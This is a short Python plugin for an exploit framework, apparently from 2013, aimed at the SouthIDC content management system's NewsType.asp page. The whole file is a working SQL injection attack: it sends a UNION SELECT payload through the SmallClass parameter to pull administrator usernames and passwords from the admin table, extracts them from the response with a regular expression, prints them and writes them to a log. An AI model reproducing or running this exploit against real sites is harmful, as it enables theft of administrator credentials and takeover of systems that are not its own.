# -*- coding: utf-8 -*-
class mstplugin:
    infos = [
        ['Plugin','SouthIDC NewsType.asp SqlInject Exp'],
        ['Author','mst'],
        ['Update','2013/10/20'],
        ['site','http://mstoor.duapp.com']
        ]
    opts  = [
        ['URL','localhost','Url'],
        ['PATH','/','Cms path'],
        ['PORT','80','port']
        ]
    def exploit(self):
        url = fuck.urlformate(URL,PORT,PATH)
        exp = url+"NewsType.asp?SmallClass='%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20''='"
        color.cprint("[*] Sending exp..",YELLOW)
        ok  = fuck.urlget(exp)
        if ok.getcode() == 200:
            tmp=fuck.find('[>]+\w+[|]+\w+[<]+',ok.read())
            if len(tmp)>0:
                color.cprint("[*] Exploit Successful !",GREEN)
                for i in range(len(tmp)):
                    tmp[i] = tmp[i][1:len(tmp[i])-1]
                    color.cprint("[%s] %s"%(i,tmp[i]),GREEN)
                    fuck.writelog("southidc_newstype_sqli",URL+"::"+tmp[i])
            else:
                color.cprint("[!] TARGET NO VULNERABLE !",RED)
        else:
            color.cprint("[!] EXPLOIT FALSE ! CODE:%s"%ok.getcode(),RED)
